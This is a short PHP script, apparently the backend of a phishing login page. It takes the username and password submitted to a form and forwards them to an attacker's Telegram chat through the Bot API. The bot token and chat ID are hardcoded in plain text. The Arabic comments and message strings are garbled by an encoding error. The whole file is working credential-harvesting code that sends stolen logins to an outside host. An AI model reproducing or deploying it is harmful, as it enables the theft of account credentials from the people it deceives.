<?php
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    // ุฅุนุฏุงุฏ ุชููู ุงูุจูุช ููุนุฑูู ุงููุณุชุฎุฏู
    $token = "7744008835:AAHD6EUwjMjTDVUZmIT7TzW2OmOHC5MA7Zs"; // ุชููู ุงูุจูุช ุงูุฎุงุต ุจู
    $chat_id = "168389143"; // ูุนุฑูู ุงููุณุชุฎุฏู ุงูุฎุงุต ุจู
    
    // ุงุณุชูุจุงู ุงูุจูุงูุงุช ูู ุงููููุฐุฌ
    $username = $_POST['username'] ?? 'ุบูุฑ ูุชููุฑ';
    $password = $_POST['password'] ?? 'ุบูุฑ ูุชููุฑ';
    
    // ุฅุนุฏุงุฏ ุงูุฑุณุงูุฉ
    $message = "๐จ ุจูุงูุงุช ุชุณุฌูู ุงูุฏุฎูู ๐จ\n\n" .
               "๐ง ุงุณู ุงููุณุชุฎุฏู: " . $username . "\n" .
               "๐ ูููุฉ ุงูุณุฑ: " . $password;

    // ุฅุฑุณุงู ุงูุจูุงูุงุช ุฅูู ุชูููุฌุฑุงู
    $url = "https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($message);
    $response = file_get_contents($url);

    // ุงูุชุฃูุฏ ูู ูุฌุงุญ ุงูุฅุฑุณุงู
    if ($response) {
        echo "ุชู ุฅุฑุณุงู ุงูุจูุงูุงุช ุฅูู ุชูููุฌุฑุงู!";
    } else {
        echo "ูุดู ูู ุฅุฑุณุงู ุงูุจูุงูุงุช.";
    }
} else {
    echo "ุทูุจ ุบูุฑ ุตุงูุญ!";
}
?>